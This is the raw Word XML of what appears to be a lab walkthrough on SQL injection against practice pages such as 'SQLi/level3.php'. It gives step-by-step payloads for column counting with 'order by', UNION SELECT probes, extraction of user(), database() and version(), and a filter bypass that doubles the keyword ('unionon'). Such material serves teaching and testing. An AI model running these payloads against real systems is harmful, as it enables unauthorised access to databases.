                <v:shape id="Shape 14" style="position:absolute;left:1524;top:1524;width:59436;height:22955;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1033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">
                  <v:imagedata o:title="" r:id="rId12"/>
                </v:shape>
                <v:rect id="Rectangle 234906253" style="position:absolute;left:5604;top:19914;width:49335;height:2301;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1034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701311EA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07ECD614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As we can see the error is generated </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>now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we have to do the second step. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="23DD7D55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2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>showprofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=4’ -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="031DE4F9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195477D1" wp14:editId="58855A67">
                <wp:extent cx="5943600" cy="2552700"/>
                <wp:effectExtent l="0" t="0" r="0" b="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52700"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2543175"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="38" name="Shape 38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831669" name="Rectangle 50831669"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2832025" y="2031450"/>
                            <a:ext cx="1110900" cy="39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5B12E35A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" style="width:468pt;height:201pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,25431" coordorigin="1524,1524" o:spid="_x0000_s1035" w14:anchorId="195477D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">
                <v:shape id="Shape 38" style="position:absolute;left:1524;top:1524;width:59436;height:25431;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1036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">
                  <v:imagedata o:title="" r:id="rId14"/>
                </v:shape>
                <v:rect id="Rectangle 50831669" style="position:absolute;left:28320;top:20314;width:11109;height:3903;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1037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5B12E35A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2CE5D5B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3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">$ profile id: 4’ order by 50 -- - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>( Start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with greater Number always )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="0843816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0EE9F438" wp14:editId="404AB0CE">
                <wp:extent cx="5943600" cy="2425700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25700"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2409825"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="22" name="Shape 22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1258509" name="Rectangle 2051258509"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2331650" y="2071475"/>
                            <a:ext cx="1631100" cy="190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2EEA1B09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" style="width:468pt;height:191pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,24098" coordorigin="1524,1524" o:spid="_x0000_s1038" w14:anchorId="0EE9F4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">
                <v:shape id="Shape 22" style="position:absolute;left:1524;top:1524;width:59436;height:24098;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1039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">
                  <v:imagedata o:title="" r:id="rId16"/>
                </v:shape>
                <v:rect id="Rectangle 2051258509" style="position:absolute;left:23316;top:20714;width:16311;height:1902;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1040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2EEA1B09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20C738D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Then decrease the number gradually </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="15DB3D7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0C6DABFA" wp14:editId="666B40D4">
                <wp:extent cx="5943600" cy="2286000"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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86000"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2276500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="32" name="Shape 32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3227504" name="Rectangle 683227504"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2661900" y="1861325"/>
                            <a:ext cx="1170900" cy="42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58EEDBD9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style="width:468pt;height:180pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,22765" coordorigin="1524,1524" o:spid="_x0000_s1041" w14:anchorId="0C6DABFA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">
                <v:shape id="Shape 32" style="position:absolute;left:1524;top:1524;width:59436;height:22764;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1042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">
                  <v:imagedata o:title="" r:id="rId18"/>
                </v:shape>
                <v:rect id="Rectangle 683227504" style="position:absolute;left:26619;top:18613;width:11709;height:4203;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1043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58EEDBD9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16D2812F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Here the number of columns is 4. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="24B2B853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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: $ -4’ union select 1,2,3,4 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="7756103B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3BA2E8E5" wp14:editId="73CD77E6">
                <wp:extent cx="5943600" cy="2705100"/>
                <wp:effectExtent l="0" t="0" r="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05100"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2695575"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="42" name="Shape 42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1834376" name="Rectangle 471834376"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2832025" y="2391725"/>
                            <a:ext cx="750600" cy="36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464A771B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" style="width:468pt;height:213pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,26955" coordorigin="1524,1524" o:spid="_x0000_s1044" w14:anchorId="3BA2E8E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">
                <v:shape id="Shape 42" style="position:absolute;left:1524;top:1524;width:59436;height:26955;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1045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">
                  <v:imagedata o:title="" r:id="rId20"/>
                </v:shape>
                <v:rect id="Rectangle 471834376" style="position:absolute;left:28320;top:23917;width:7506;height:3603;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1046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464A771B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3BB99D99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-4’ union select 111,222,333,4444 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="5ADFBB4A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2C7DA32C" wp14:editId="6AE9A91F">
                <wp:extent cx="5943600" cy="2514600"/>
                <wp:effectExtent l="0" t="0" r="0" b="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14600"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2505075"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="24" name="Shape 24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3033924" name="Rectangle 1673033924"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2832025" y="2221600"/>
                            <a:ext cx="830700" cy="33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6531D6A1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" style="width:468pt;height:198pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,25050" coordorigin="1524,1524" o:spid="_x0000_s1047" w14:anchorId="2C7DA32C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">
                <v:shape id="Shape 24" style="position:absolute;left:1524;top:1524;width:59436;height:25050;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1048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">
                  <v:imagedata o:title="" r:id="rId22"/>
                </v:shape>
                <v:rect id="Rectangle 1673033924" style="position:absolute;left:28320;top:22216;width:8307;height:3303;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1049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6531D6A1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5420F56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Step 5:  $ -4’ union select user(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>),database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(),version(),4444 -- - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="0F72488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109F7CF" wp14:editId="16748942">
                <wp:extent cx="5943600" cy="2336800"/>
                <wp:effectExtent l="0" t="0" r="0" b="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36800"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2324100"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="10" name="Shape 10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8959176" name="Rectangle 1518959176"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2471750" y="2011425"/>
                            <a:ext cx="1601100" cy="42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62AE478A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" style="width:468pt;height:184pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,23241" coordorigin="1524,1524" o:spid="_x0000_s1050" w14:anchorId="2109F7C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">
                <v:shape id="Shape 10" style="position:absolute;left:1524;top:1524;width:59436;height:23241;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1051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">
                  <v:imagedata o:title="" r:id="rId24"/>
                </v:shape>
                <v:rect id="Rectangle 1518959176" style="position:absolute;left:24717;top:20114;width:16011;height:4203;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1052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62AE478A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2E54548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743BACCF" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b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Now let’s Choose Level 3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="3061856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0FC26047" wp14:editId="2EF43938">
                <wp:extent cx="5943600" cy="2146300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46300"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2133600"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="34" name="Shape 34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7545275" name="Rectangle 2137545275"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2081475" y="1751250"/>
                            <a:ext cx="1721100" cy="160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140EAE0E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style="width:468pt;height:169pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,21336" coordorigin="1524,1524" o:spid="_x0000_s1053" w14:anchorId="0FC260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">
                <v:shape id="Shape 34" style="position:absolute;left:1524;top:1524;width:59436;height:21336;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1054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">
                  <v:imagedata o:title="" r:id="rId26"/>
                </v:shape>
                <v:rect id="Rectangle 2137545275" style="position:absolute;left:20814;top:17512;width:17211;height:1602;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1055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140EAE0E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2846773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2591DF4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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6A43E060" wp14:editId="4903A435">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="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2CDF" w:rsidRDefault="003A2CDF" w14:paraId="1FDED55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42ABFB58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BBF5D39" wp14:editId="6768109F">
                <wp:extent cx="5943600" cy="279400"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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9400"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="257175"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="40" name="Shape 40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719082" name="Rectangle 136719082"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1210850" y="200150"/>
                            <a:ext cx="1681200" cy="1800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0C39C3CB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style="width:468pt;height:22pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,2571" coordorigin="1524,1524" o:spid="_x0000_s1056" w14:anchorId="2BBF5D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">
                <v:shape id="Shape 40" style="position:absolute;left:1524;top:1524;width:59436;height:2571;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1057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">
                  <v:imagedata o:title="" r:id="rId29"/>
                </v:shape>
                <v:rect id="Rectangle 136719082" style="position:absolute;left:12108;top:2001;width:16812;height:1800;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1058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0C39C3CB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5AD63F66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84B237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1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ SQLi/level3.php?item=3’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="259D60C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1E529774" wp14:editId="618901FF">
                <wp:extent cx="5943600" cy="1828800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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28800"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="1819275"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="46" name="Shape 46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8332556" name="Rectangle 228332556"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="510375" y="1360975"/>
                            <a:ext cx="5263800" cy="54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1EF2149E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" style="width:468pt;height:2in;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,18192" coordorigin="1524,1524" o:spid="_x0000_s1059" w14:anchorId="1E5297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">
                <v:shape id="Shape 46" style="position:absolute;left:1524;top:1524;width:59436;height:18192;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1060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">
                  <v:imagedata o:title="" r:id="rId31"/>
                </v:shape>
                <v:rect id="Rectangle 228332556" style="position:absolute;left:5103;top:13609;width:52638;height:5403;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1061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1EF2149E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000000" w14:paraId="2196A17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lastRenderedPageBreak/>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ SQLi/level3.php?item=3’ -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="2ABE012B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601E9111" wp14:editId="0FB01591">
                <wp:extent cx="5943600" cy="1866900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66900"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="1858475"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="816171198" name="Shape 12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5849508" name="Rectangle 755849508"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2511775" y="1631150"/>
                            <a:ext cx="1350900" cy="370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520D0DEC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style="width:468pt;height:147pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,18584" coordorigin="1524,1524" o:spid="_x0000_s1062" w14:anchorId="601E91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">
                <v:shape id="Shape 12" style="position:absolute;left:1524;top:1524;width:59436;height:18383;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1063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">
                  <v:imagedata o:title="" r:id="rId33"/>
                </v:shape>
                <v:rect id="Rectangle 755849508" style="position:absolute;left:25117;top:16311;width:13509;height:3702;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1064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520D0DEC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563F9068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5F93D20D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3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$ SQLi/level3.php?item=3' order by 30 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="44EE289F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71380DBA" wp14:editId="0E737F4D">
                <wp:extent cx="5943600" cy="1879600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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79600"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="1866900"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="626882980" name="Shape 26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1080376" name="Rectangle 2111080376"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2241600" y="1491050"/>
                            <a:ext cx="2171400" cy="3804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64AC1474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style="width:468pt;height:148pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,18669" coordorigin="1524,1524" o:spid="_x0000_s1065" w14:anchorId="71380DBA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">
                <v:shape id="Shape 26" style="position:absolute;left:1524;top:1524;width:59436;height:18669;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1066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">
                  <v:imagedata o:title="" r:id="rId35"/>
                </v:shape>
                <v:rect id="Rectangle 2111080376" style="position:absolute;left:22416;top:14910;width:21714;height:3804;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1067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64AC1474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7F9924D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126439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SQLi/level3.php?item=3' order by 3 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="23FBAD6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7FE761A5" wp14:editId="6A99EB61">
                <wp:extent cx="5943600" cy="215900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9000"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2143125"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1804181106" name="Shape 16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7797024" name="Rectangle 817797024"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2461750" y="1721225"/>
                            <a:ext cx="1511100" cy="39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765934A0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" style="width:468pt;height:170pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,21431" coordorigin="1524,1524" o:spid="_x0000_s1068" w14:anchorId="7FE761A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">
                <v:shape id="Shape 16" style="position:absolute;left:1524;top:1524;width:59436;height:21431;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1069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">
                  <v:imagedata o:title="" r:id="rId37"/>
                </v:shape>
                <v:rect id="Rectangle 817797024" style="position:absolute;left:24617;top:17212;width:15111;height:3903;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1070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765934A0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093929EF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710A688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4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi/level3.php?item=-3' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unionon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 select%20 1,2,3,4 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="3759C1F0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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union  =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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="0971F06E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Union </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uni-on+on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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uni+on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 = union </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="73215013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 xml:space="preserve">$ SQLi/level3.php?item=-3' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unionon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 select%20 111,222,333,4444 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="6009D7DF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DE7CC92" wp14:editId="309FB8D5">
                <wp:extent cx="5943600" cy="1816100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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16100"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="1808400"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="50" name="Shape 50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5526763" name="Rectangle 1045526763"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2421725" y="1380975"/>
                            <a:ext cx="1320900" cy="57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0668A168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" style="width:468pt;height:143pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,18084" coordorigin="1524,1524" o:spid="_x0000_s1071" w14:anchorId="2DE7CC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">
                <v:shape id="Shape 50" style="position:absolute;left:1524;top:1524;width:59436;height:18002;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1072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">
                  <v:imagedata o:title="" r:id="rId39"/>
                </v:shape>
                <v:rect id="Rectangle 1045526763" style="position:absolute;left:24217;top:13809;width:13209;height:5703;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1073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0668A168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74AB604C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D9A3F17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5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ SQLi/level3.php?item=-3' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unionon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> select user(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>),database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(),version(),444 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="51733C62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7A829B44" wp14:editId="7F8B8260">
                <wp:extent cx="5943600" cy="2057400"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1368454873" name="Group 1368454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57400"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2047875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1804787635" name="Shape 20"/>
                          <pic:cNvPicPr preferRelativeResize="0"/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6275014" name="Rectangle 796275014"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2581825" y="1401000"/>
                            <a:ext cx="1380900" cy="54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0D9B3F20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8454873" style="width:468pt;height:162pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,20478" coordorigin="1524,1524" o:spid="_x0000_s1074" w14:anchorId="7A829B4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">
                <v:shape id="Shape 20" style="position:absolute;left:1524;top:1524;width:59436;height:20478;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1075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">
                  <v:imagedata o:title="" r:id="rId41"/>
                </v:shape>
                <v:rect id="Rectangle 796275014" style="position:absolute;left:25818;top:14010;width:13809;height:5403;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1076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0D9B3F20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4CE04C26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53D631C2" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
